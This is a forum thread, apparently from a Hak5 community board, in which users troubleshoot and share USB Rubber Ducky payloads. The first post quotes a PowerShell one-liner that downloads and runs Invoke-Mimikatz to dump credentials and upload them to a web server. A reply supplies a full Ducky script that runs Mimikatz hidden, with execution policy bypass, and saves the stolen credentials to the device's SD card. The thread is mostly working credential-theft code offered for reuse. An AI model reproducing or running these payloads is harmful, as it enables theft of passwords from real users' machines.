Exmix Posted September 2, 2017 Share Posted September 2, 2017 So messing with this Payload I found here: https://www.hak5.org/blog/15-second-password-hack-mr-robot-style I got it all working up to the point where it tries to output the file back to my Web Server. I get an error that says: Exception calling "UploadString" with "2" argument(s): "The remote server returned and error: (405) Method not allowed." At line:1 char:156 + IEX (New-Object Net.WebClient).DownloadString('Http://MyWebServer/im.ps1'): $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString <<<< ('Http://MyWebServer/rx.php', $output) +CategoryInfo : NotSpecified: (:) []. MethodInvocationException +FullyQualifiedErrorID : DotNetMethodException So I was looking into this error for a while and I can't really find much on how to fix this. My WebServer is Windows 2012 R2. I was wondering if anyone could help me fix this part here possibly OR help with how to just output it to a .txt file or something on the SD Card since I have my duck as the TwinDuck. Quote Link to comment Share on other sites More sharing options...
ThoughtfulDev Posted September 2, 2017 Share Posted September 2, 2017 Are you sure that php is enabled in your apache or IIS webserver? try to place a php file e.g test.php in the webdirectory root with the following content: <?php phpinfo(); ?> if you now visit yourwebserver/test.php you should see a table with some information if php is enabled. I use this to run mimikatz from sdcard/exec/mimikatz.ps1 and save the content to sdcard/data/mimikatz REM ------------------------------------------------------------------------------------- REM Get drive letter of drive with label DUCKY REM ------------------------------------------------------------------------------------- STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d ENTER DELAY 500 REM ------------------------------------------------------------------------------------- REM Copy and execute Invoke Mimikatz REM ------------------------------------------------------------------------------------- STRING if exist %duck%\exec\mimikatz.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\exec\mimikatz.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\data\mimikatz\%computername%_creds.txt';" Make sure that sdcard/exec/mimikatz.ps1 and the folder sdcard/data/mimikatz exist. Quote Link to comment Share on other sites More sharing options...
Exmix Posted September 2, 2017 Author Share Posted September 2, 2017 10 hours ago, ThoughtfulDev said: Are you sure that php is enabled in your apache or IIS webserver? try to place a php file e.g test.php in the webdirectory root with the following content: <?php phpinfo(); ?> if you now visit yourwebserver/test.php you should see a table with some information if php is enabled. I use this to run mimikatz from sdcard/exec/mimikatz.ps1 and save the content to sdcard/data/mimikatz REM ------------------------------------------------------------------------------------- REM Get drive letter of drive with label DUCKY REM ------------------------------------------------------------------------------------- STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d ENTER DELAY 500 REM ------------------------------------------------------------------------------------- REM Copy and execute Invoke Mimikatz REM ------------------------------------------------------------------------------------- STRING if exist %duck%\exec\mimikatz.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\exec\mimikatz.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\data\mimikatz\%computername%_creds.txt';" Make sure that sdcard/exec/mimikatz.ps1 and the folder sdcard/data/mimikatz exist. Wow, I feel so silly. That's the one thing I didn't check... I got it running on there with no issues as soon as I Installed and enabled php. Thank you so much. Also I like your script as well, i'll grab that and save it for when I wanna try that. Seems simpler and doesn't require internet connection. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.